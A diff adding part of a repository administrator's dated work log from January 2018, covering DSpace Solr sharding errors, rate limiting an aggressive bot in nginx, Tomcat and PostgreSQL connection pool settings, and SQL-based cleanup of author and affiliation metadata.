+        at org.apache.http.entity.InputStreamEntity.writeTo(InputStreamEntity.java:132)
+        at org.apache.http.entity.HttpEntityWrapper.writeTo(HttpEntityWrapper.java:89)
+        at org.apache.http.impl.client.EntityEnclosingRequestWrapper$EntityWrapper.writeTo(EntityEnclosingRequestWrapper.java:108)
+        at org.apache.http.impl.entity.EntitySerializer.serialize(EntitySerializer.java:117)
+        at org.apache.http.impl.AbstractHttpClientConnection.sendRequestEntity(AbstractHttpClientConnection.java:265)
+        at org.apache.http.impl.conn.ManagedClientConnectionImpl.sendRequestEntity(ManagedClientConnectionImpl.java:203)
+        at org.apache.http.protocol.HttpRequestExecutor.doSendRequest(HttpRequestExecutor.java:236)
+        at org.apache.http.protocol.HttpRequestExecutor.execute(HttpRequestExecutor.java:121)
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:685)
+        ... 16 more
+</code></pre><ul>
+<li>DSpace Test has the same error but with creating the 2017 core:</li>
+</ul>
+<pre tabindex="0"><code>Moving: 2243021 into core statistics-2017
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2243)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+</code></pre><ul>
+<li>There is interesting documentation about this on the DSpace Wiki: <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics+Maintenance#SOLRStatisticsMaintenance-SolrShardingByYear">https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics+Maintenance#SOLRStatisticsMaintenance-SolrShardingByYear</a></li>
+<li>I&rsquo;m looking to see maybe if we&rsquo;re hitting the issues mentioned in <a href="https://jira.duraspace.org/browse/DS-2212">DS-2212</a> that were apparently fixed in DSpace 5.2</li>
+<li>I can apparently search for records in the Solr stats core that have an empty <code>owningColl</code> field using this in the Solr admin query: <code>-owningColl:*</code></li>
+<li>On CGSpace I see 48,000,000 records that have an <code>owningColl</code> field and 34,000,000 that don&rsquo;t:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound 
+  &#34;response&#34;:{&#34;numFound&#34;:48476327,&#34;start&#34;:0,&#34;docs&#34;:[
+$ http &#39;http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:34879872,&#34;start&#34;:0,&#34;docs&#34;:[
+</code></pre><ul>
+<li>I tested the <code>dspace stats-util -s</code> process on my local machine and it failed the same way</li>
+<li>It doesn&rsquo;t seem to be helpful, but the dspace log shows this:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-10 10:51:19,301 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2018-01-10 10:51:19,301 INFO  org.dspace.statistics.SolrLogger @ Moving: 3821 records into core statistics-2016
+</code></pre><ul>
+<li>Terry Brady has written some notes on the DSpace Wiki about Solr sharing issues: <a href="https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues">https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues</a></li>
+<li>Uptime Robot said that CGSpace went down at around 9:43 AM</li>
+<li>I looked at PostgreSQL&rsquo;s <code>pg_stat_activity</code> table and saw 161 active connections, but no pool errors in the DSpace logs:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-10 
+0
+</code></pre><ul>
+<li>The XMLUI logs show quite a bit of activity today:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    951 207.46.13.159
+    954 157.55.39.123
+   1217 95.108.181.88
+   1503 104.196.152.243
+   6455 70.36.107.50
+  11412 70.36.107.190
+  16730 70.36.107.49
+  17386 2607:fa98:40:9:26b6:fdff:feff:1c96
+  21566 2607:fa98:40:9:26b6:fdff:feff:195d
+  45384 2607:fa98:40:9:26b6:fdff:feff:1888
+</code></pre><ul>
+<li>The user agent for the top six or so IPs are all the same:</li>
+</ul>
+<pre tabindex="0"><code>&#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34;
+</code></pre><ul>
+<li><code>whois</code> says they come from <a href="http://www.perfectip.net/">Perfect IP</a></li>
+<li>I&rsquo;ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l                                                                                                                                                                                                  
+49096
+</code></pre><ul>
+<li>Rather than blocking their IPs, I think I might just add their user agent to the &ldquo;badbots&rdquo; zone with Baidu, because they seem to be the only ones using that user agent:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
+/537.36&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+   6796 70.36.107.50
+  11870 70.36.107.190
+  17323 70.36.107.49
+  19204 2607:fa98:40:9:26b6:fdff:feff:1c96
+  23401 2607:fa98:40:9:26b6:fdff:feff:195d 
+  47875 2607:fa98:40:9:26b6:fdff:feff:1888
+</code></pre><ul>
+<li>I added the user agent to nginx&rsquo;s badbots limit req zone but upon testing the config I got an error:</li>
+</ul>
+<pre tabindex="0"><code># nginx -t
+nginx: [emerg] could not build map_hash, you should increase map_hash_bucket_size: 64
+nginx: configuration file /etc/nginx/nginx.conf test failed
+</code></pre><ul>
+<li>According to nginx docs the <a href="https://nginx.org/en/docs/hash.html">bucket size should be a multiple of the CPU&rsquo;s cache alignment</a>, which is 64 for us:</li>
+</ul>
+<pre tabindex="0"><code># cat /proc/cpuinfo | grep cache_alignment | head -n1
+cache_alignment : 64
+</code></pre><ul>
+<li>On our servers that is 64, so I increased this parameter to 128 and deployed the changes to nginx</li>
+<li>Almost immediately the PostgreSQL connections dropped back down to 40 or so, and UptimeRobot said the site was back up</li>
+<li>So that&rsquo;s interesting that we&rsquo;re not out of PostgreSQL connections (current pool maxActive is 300!) but the system is &ldquo;down&rdquo; to UptimeRobot and very slow to use</li>
+<li>Linode continues to test mitigations for Meltdown and Spectre: <a href="https://blog.linode.com/2018/01/03/cpu-vulnerabilities-meltdown-spectre/">https://blog.linode.com/2018/01/03/cpu-vulnerabilities-meltdown-spectre/</a></li>
+<li>I rebooted DSpace Test to see if the kernel will be updated (currently Linux 4.14.12-x86_64-linode92)&hellip; nope.</li>
+<li>It looks like Linode will reboot the KVM hosts later this week, though</li>
+<li>Udana from WLE asked if we could give him permission to upload CSVs to CGSpace (which would require super admin access)</li>
+<li>Citing concerns with metadata quality, I suggested adding him on DSpace Test first</li>
+<li>I opened a ticket with Atmire to ask them about DSpace 5.8 compatibility: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560</a></li>
+</ul>
+<h2 id="2018-01-11">2018-01-11</h2>
+<ul>
+<li>The PostgreSQL and firewall graphs from this week show clearly the load from the new bot from PerfectIP.net yesterday:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/postgres_connections-day-perfectip.png" alt="PostgreSQL load">
+<img src="/cgspace-notes/2018/01/firewall-perfectip.png" alt="Firewall load"></p>
+<ul>
+<li>Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates</li>
+<li>Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat <code>localhost_access_log</code> at the time of my sharding attempt on my test machine:</li>
+</ul>
+<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 447
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 76
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 2137630
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16253
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
+</code></pre><ul>
+<li>The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error</li>
+<li>This is apparently a common Solr error code that means &ldquo;version conflict&rdquo;: <a href="http://yonik.com/solr/optimistic-concurrency/">http://yonik.com/solr/optimistic-concurrency/</a></li>
+<li>Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34; | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+  21572 70.36.107.50
+  30722 70.36.107.190
+  34566 70.36.107.49
+ 101829 2607:fa98:40:9:26b6:fdff:feff:195d
+ 111535 2607:fa98:40:9:26b6:fdff:feff:1c96
+ 161797 2607:fa98:40:9:26b6:fdff:feff:1888
+</code></pre><ul>
+<li>Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat&rsquo;s <code>server.xml</code>:</li>
+</ul>
+<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
+          driverClassName=&#34;org.postgresql.Driver&#34;
+          url=&#34;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&#34;
+          username=&#34;dspace&#34;
+          password=&#34;dspace&#34;
+          initialSize=&#39;5&#39;
+          maxActive=&#39;75&#39;
+          maxIdle=&#39;15&#39;
+          minIdle=&#39;5&#39;
+          maxWait=&#39;5000&#39;
+          validationQuery=&#39;SELECT 1&#39;
+          testOnBorrow=&#39;true&#39; /&gt;
+</code></pre><ul>
+<li>So theoretically I could name each connection &ldquo;xmlui&rdquo; or &ldquo;dspaceWeb&rdquo; or something meaningful and it would show up in PostgreSQL&rsquo;s <code>pg_stat_activity</code> table!</li>
+<li>This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)</li>
+<li>Also, I realized that the <code>db.jndi</code> parameter in dspace.cfg needs to match the <code>name</code> value in your applicaiton&rsquo;s context—not the <code>global</code> one</li>
+<li>Ah hah! Also, I can name the default DSpace connection pool in dspace.cfg as well, like:</li>
+</ul>
+<pre tabindex="0"><code>db.url = jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceDefault
+</code></pre><ul>
+<li>With that it is super easy to see where PostgreSQL connections are coming from in <code>pg_stat_activity</code></li>
+</ul>
+<h2 id="2018-01-12">2018-01-12</h2>
+<ul>
+<li>I&rsquo;m looking at the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Installing+DSpace#InstallingDSpace-ServletEngine(ApacheTomcat7orlater,Jetty,CauchoResinorequivalent)">DSpace 6.0 Install docs</a> and notice they tweak the number of threads in their Tomcat connector:</li>
+</ul>
+<pre tabindex="0"><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
+&lt;Connector port=&#34;8080&#34;
+           maxThreads=&#34;150&#34;
+           minSpareThreads=&#34;25&#34;
+           maxSpareThreads=&#34;75&#34;
+           enableLookups=&#34;false&#34;
+           redirectPort=&#34;8443&#34;
+           acceptCount=&#34;100&#34;
+           connectionTimeout=&#34;20000&#34;
+           disableUploadTimeout=&#34;true&#34;
+           URIEncoding=&#34;UTF-8&#34;/&gt;
+</code></pre><ul>
+<li>In Tomcat 8.5 the <code>maxThreads</code> defaults to 200 which is probably fine, but tweaking <code>minSpareThreads</code> could be good</li>
+<li>I don&rsquo;t see a setting for <code>maxSpareThreads</code> in the docs so that might be an error</li>
+<li>Looks like in Tomcat 8.5 the default URIEncoding for Connectors is UTF-8, so we don&rsquo;t need to specify that manually anymore: <a href="https://tomcat.apache.org/tomcat-8.5-doc/config/http.html">https://tomcat.apache.org/tomcat-8.5-doc/config/http.html</a></li>
+<li>Ooh, I just saw the <code>acceptorThreadCount</code> setting (in Tomcat 7 and 8.5):</li>
+</ul>
+<pre tabindex="0"><code>The number of threads to be used to accept connections. Increase this value on a multi CPU machine, although you would never really need more than 2. Also, with a lot of non keep alive connections, you might want to increase this value as well. Default value is 1.
+</code></pre><ul>
+<li>That could be very interesting</li>
+</ul>
+<h2 id="2018-01-13">2018-01-13</h2>
+<ul>
+<li>Still testing DSpace 6.2 on Tomcat 8.5.24</li>
+<li>Catalina errors at Tomcat 8.5 startup:</li>
+</ul>
+<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &#34;35&#34; for &#34;maxActive&#34; property, which is being ignored.
+13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &#34;5000&#34; for &#34;maxWait&#34; property, which is being ignored.
+</code></pre><ul>
+<li>I looked in my Tomcat 7.0.82 logs and I don&rsquo;t see anything about DBCP2 errors, so I guess this a Tomcat 8.0.x or 8.5.x thing</li>
+<li>DBCP2 appears to be Tomcat 8.0.x and up according to the <a href="https://tomcat.apache.org/migration-8.html">Tomcat 8.0 migration guide</a></li>
+<li>I have updated our <a href="https://github.com/ilri/rmg-ansible-public/commit/246f9d7b06d53794f189f0cc57ad5ddd80f0b014">Ansible infrastructure scripts</a> so that it will be ready whenever we switch to Tomcat 8 (probably with Ubuntu 18.04 later this year)</li>
+<li>When I enable the ResourceLink in the ROOT.xml context I get the following error in the Tomcat localhost log:</li>
+</ul>
+<pre tabindex="0"><code>13-Jan-2018 14:14:36.017 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.app.util.DSpaceWebappListener]
+ java.lang.ExceptionInInitializerError
+        at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
+        at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
+        at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4745)
+        at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5207)
+        at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+        at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:752)
+        at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:728)
+        at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+        at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+        at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1839)
+        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.NullPointerException
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:547)
+        at org.dspace.core.Context.&lt;clinit&gt;(Context.java:103)
+        ... 15 more
+</code></pre><ul>
+<li>Interesting blog post benchmarking Tomcat JDBC vs Apache Commons DBCP2, with configuration snippets: <a href="http://www.tugay.biz/2016/07/tomcat-connection-pool-vs-apache.html">http://www.tugay.biz/2016/07/tomcat-connection-pool-vs-apache.html</a></li>
+<li>The Tomcat vs Apache pool thing is confusing, but apparently we&rsquo;re using Apache Commons DBCP2 because we don&rsquo;t specify <code>factory=&quot;org.apache.tomcat.jdbc.pool.DataSourceFactory&quot;</code> in our global resource</li>
+<li>So at least I know that I&rsquo;m not looking for documentation or troubleshooting on the Tomcat JDBC pool!</li>
+<li>I looked at <code>pg_stat_activity</code> during Tomcat&rsquo;s startup and I see that the pool created in server.xml is indeed connecting, just that nothing uses it</li>
+<li>Also, the fallback connection parameters specified in local.cfg (not dspace.cfg) are used</li>
+<li>Shit, this might actually be a DSpace error: <a href="https://jira.duraspace.org/browse/DS-3434">https://jira.duraspace.org/browse/DS-3434</a></li>
+<li>I&rsquo;ll comment on that issue</li>
+</ul>
+<h2 id="2018-01-14">2018-01-14</h2>
+<ul>
+<li>Looking at the authors Peter had corrected</li>
+<li>Some had multiple and he&rsquo;s corrected them by adding <code>||</code> in the correction column, but I can&rsquo;t process those this way so I will just have to flag them and do those manually later</li>
+<li>Also, I can flag the values that have &ldquo;DELETE&rdquo;</li>
+<li>Then I need to facet the correction column on isBlank(value) and not flagged</li>
+</ul>
+<h2 id="2018-01-15">2018-01-15</h2>
+<ul>
+<li>Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload</li>
+<li>I&rsquo;m going to apply these ~130 corrections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
+update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
+update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
+update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
+update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
+update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
+update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
+</code></pre><ul>
+<li>Continue proofing Peter&rsquo;s author corrections that I started yesterday, faceting on non blank, non flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/openrefine-authors.png" alt="OpenRefine Authors"></p>
+<ul>
+<li>Apply corrections using <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>In looking at some of the values to delete or check I found some metadata values that I could not resolve their handle via SQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Tarawali&#39;;
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
+-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
+           2757936 |        4369 |                 3 | Tarawali   |           |     9 |           |        600 |                2
+(1 row)
+
+dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;4369&#39;;
+ handle
+--------
+(0 rows)
+</code></pre><ul>
+<li>Even searching in the DSpace advanced search for author equals &ldquo;Tarawali&rdquo; produces nothing&hellip;</li>
+<li>Otherwise, the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL Helper Functions</a> provide <code>ds5_item2itemhandle()</code>, which is much easier than my long query above that I always have to go search for</li>
+<li>For example, to find the Handle for an item that has the author &ldquo;Erni&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Erni&#39;;
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place |              authority               | confidence | resource_type_id 
+-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
+           2612150 |       70308 |                 3 | Erni       |           |     9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 |         -1 |                2
+(1 row)
+dspace=# select ds5_item2itemhandle(70308);
+ ds5_item2itemhandle 
+---------------------
+ 10568/68609
+(1 row)
+</code></pre><ul>
+<li>Next I apply the author deletions:</li>
+</ul>
+<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Now working on the affiliation corrections from Peter:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
+$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Now I made a new list of affiliations for Peter to look through:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 4552
+</code></pre><ul>
+<li>Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)</li>
+<li>For example, this one is from just last month: <a href="https://cgspace.cgiar.org/handle/10568/89930">https://cgspace.cgiar.org/handle/10568/89930</a></li>
+<li>Our controlled vocabulary has this in the format without the abbreviation: International Center for Tropical Agriculture</li>
+<li>So some submitters don&rsquo;t know to use the controlled vocabulary lookup</li>
+<li>Help Sisay with some thumbnails for book chapters in Open Refine and SAFBuilder</li>
+<li>CGSpace users were having problems logging in, I think something&rsquo;s wrong with LDAP because I see this in the logs:</li>
+</ul>
